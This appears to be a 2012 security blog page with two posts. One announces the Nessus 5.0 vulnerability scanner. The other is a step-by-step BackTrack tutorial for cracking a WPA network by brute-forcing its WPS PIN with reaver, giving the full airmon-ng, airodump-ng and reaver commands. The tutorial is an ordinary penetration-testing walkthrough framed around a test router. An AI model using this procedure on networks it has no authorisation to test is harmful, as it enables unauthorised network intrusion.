Thursday, 16 February 2012

Nessus 5.0 Released


Nessus 5.0 delivers introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include:

Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up-and-running, completely configured in minutes.
Nessus 5.0 delivers introduces enhancements that streamline and optimize each of the major phases of the vulnerability and configuration assessment process. Specific benefits include:
Streamlined startup – New installation wizard and web interface ensure Nessus 5.0 is up-and-running, completely configured in minutes.

Rapid policy creation – More than two dozen new plugin filters make it fast and easy to create policies for targeted scans. Selecting multiple filter criteria, such as, vulnerability publication date, public vulnerability database ID, information assurance vulnerability alert (IAVA), and more, makes it simple to identify easily-exploitable vulnerabilities.

Industry-leading efficiency – Real-time scan results combined with on-the-fly filtering allow users to quickly see risk level and act upon vulnerability data without waiting for the scan to complete. One-click navigation makes it easy to jump from critical vulnerability to vulnerable host to the details of the vulnerability. Five severity levels quickly separate informational data from actionable results.

Fully customizable reports – Multiple filters, results management, and new pre-configured report formats allow users to produce targeted reports tailored to fit the needs/interests of executives, systems administrators, and auditors. Users can also combine multiple report templates into a single, comprehensive report, which can be delivered in a variety of formats, including PDF.

“Tenable’s dynamic library of now nearly 50,000 individual vulnerability and configuration checks is updated continuously to ensure the accuracy and relevance of Nessus scans and audits. Our next-generation scanner continues to be recognized by security professionals, network penetration testing teams, and auditors as the de facto standard for vulnerability and configuration assessment.” said Ron Gula, CEO and CTO of Tenable Network Security. “Version 5.0 builds on the solid foundation Nessus has established for quality and accuracy, and now makes it easier and faster to install and use.”

download and info :

Sunday, 8 January 2012

BackTrack - Cracking a WPA password with reaver

Wi-Fi Protected Setup (WPS) was introdused to allow home users with little or no knowelage of wirelss security to set up a wireless network encrypted with WPA or WPA2 as well as making it easy to add new devices to an existing network without entering long passwords/passphrases.


In this example I will be using BackTrack 5 R1 Gnome 32 bit.

You can either boot off the DVD or install it. The creating of a bootable DVD and installing BackTrack is beyond the scope of this tutorial. 

I'm assuming you have two network connections one for internet access and one with your wireless adapter that we will be using in this test. In my case I'm using both a wired and wireless adapter.
Open up a terminal and run the following commands

apt-get update
apt-get install reaver


Next we need to find out what interface is assigned to your wireless card using the following command.


iwconfig


In my case wlan0
Next we need to put the wireless card in to monitor mode.


airmon-ng start wlan0


The monitor interface created is mon0
Next we need to find the BSSID of our test router we want to crack


airodump-ng wlan0


In my case 00:11:22:33:44:55
Next we launch reaver


reaver -i mon0 -b 00:11:22:33:44:55 -vv


Now sit back and wait, grab a cup or two of coffee, and let reaver do its thing. Reaver will now try a series of PINs on the router in a brute force attack, one after another. This will take a while. In my case it took just over 2 hours.